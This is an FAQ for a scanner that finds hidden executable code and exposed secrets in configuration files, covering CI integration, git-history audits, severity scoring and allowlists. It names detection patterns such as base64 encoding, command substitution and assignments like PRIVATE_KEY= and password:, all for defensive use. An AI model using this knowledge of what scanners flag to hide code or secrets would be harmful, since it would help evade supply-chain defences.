Find answers to common questions about detecting hidden code in configuration files.
Configuration files like .env, .terraform, docker-compose.yml, and Kubernetes manifests often contain executable patterns, credentials, API keys, and database passwords. Attackers frequently target these files because they often contain the most sensitive infrastructure data. Hidden code patterns in configs can execute during builds or deployments, bypassing standard code review.
The scanner uses pattern recognition to identify code signatures commonly used to inject executable logic into config files. It detects base64 encoding, shell escapes, variable interpolation tricks, and command substitution syntax. It also flags suspicious import statements and external references that could load malicious code at runtime.
Yes. The scanner identifies common patterns for exposed secrets including AWS keys, database credentials, API tokens, and private encryption keys. It recognizes patterns like PRIVATE_KEY=, password:, and secret: assignments across all file types.
The scanner covers all common infrastructure and config file formats:
.env, .env.local)The scanner is tuned to minimize false positives by requiring multiple pattern indicators before flagging a risk. Each finding is scored by confidence level (critical, high, medium, low) so you can prioritize remediation. You can also configure allowlists for legitimate patterns in your environment.
Yes. The scanner runs as a CLI tool and can be integrated into any CI/CD platform (GitHub Actions, GitLab CI, Jenkins, CircleCI, etc.). It can fail builds if critical risks are found, or run in report-only mode for visibility without blocking deployments.
Yes. The scanner can audit your entire git history to find configuration risks that were committed in the past. This catches secrets that may have been removed from the current branch but still exist in older commits, which remains a security exposure.
Each finding includes remediation guidance. For secrets, rotate or revoke them immediately. For code injection patterns, remove the suspicious logic or refactor the config to use safer alternatives. For dependency risks, audit and update the external reference. The scanner provides severity levels to help you prioritize.
No. The scanner runs locally on your infrastructure. All scanning happens on your machines, and no config files or findings are sent to external servers. This keeps your sensitive data private.
Unlike basic secret scanners that only look for credential patterns, this tool detects hidden code and execution logic in configs. It's designed specifically for supply chain risk and catches risks that general secret scanners miss. It also works across all config file formats, not just source code.
Yes. Configure policies per team or repository to define what patterns are acceptable in your environment. You can allowlist specific patterns, set confidence thresholds, and exclude certain files from scanning. Policies enforce consistency across your infrastructure.